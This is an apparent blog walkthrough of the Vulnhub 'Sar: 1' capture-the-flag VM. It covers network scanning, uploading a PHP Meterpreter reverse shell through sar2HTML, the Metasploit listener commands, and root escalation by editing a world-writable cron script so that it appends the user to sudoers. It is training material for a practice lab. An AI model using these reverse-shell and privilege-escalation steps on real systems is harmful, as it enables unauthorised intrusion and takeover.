Sar: 1 walkthrough Vulnhub CTF

Sar: 1 walkthrough Vulnhub CTF

Today we are solving another vulnhub CTF Sar: 1 this VM is created by Love. you can download here the Machine link

Description of Sar 1 CTF

Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box.  After running the lab, we used the netdiscover command to check the IP Address of the lab.

Sar: 1 walkthrough Vulnhub

Now we will run an aggressive port scan using Nmap we see the Nmap scan target system port 80 http is open

Sar: 1 walkthrough Vulnhub

We started from port 80 and tried to browse the webpage on our browser and we see an apache default page after scanning web site I found a robots.txt

Sar: 1 walkthrough Vulnhub

opening the URL sar2HTML we already found the URL robots.txt file After enumeration the SarHTML I found a shell uploading field. Click the New button a new field is open click Browse button and navigate your shell and hit upload report.

Sar: 1 walkthrough Vulnhub

Create a simple php reverse shell using Metasploit raw formate

Sar: 1 walkthrough Vulnhub

Starting our Metasploit payload listener

  • use exploit/multi/handler
  • set payload php/meterpreter/reverse_tcp
  • set lhost 192.168.1.19
  • set lport 4545
  • run

we see our shell file uPLOAD directory now click the payload

Sar: 1 walkthrough Vulnhub

our session is connected target machine I run the shell command and we see the blank shell import python modules spawn tty shell.

Sar: 1 walkthrough Vulnhub

Enumerating the system directory and we found our first flag user.txt

Reading our First Flag love user home directory

we see the crontab script this script is run s root automatically every 5 minute

I move the /var/www/html directory and I found the bash script

cat command to see the script and we see another script write.sh inside the finally.sh we see the write.sh file permission any user edit the file

I edit the file and add our current user sudoers file using the echo command the file is run automatically every file minute

Sar: 1 walkthrough Vulnhub

After 5 minutes I run the sudo -l command and we see our current user entry sudoers file

Sar: 1 walkthrough Vulnhub
Privilege Escalation

Finally, I found our last root flag root.txt

Sar: 1 walkthrough Vulnhub
MuzzyBox 1 Vulnhub Walkthrough read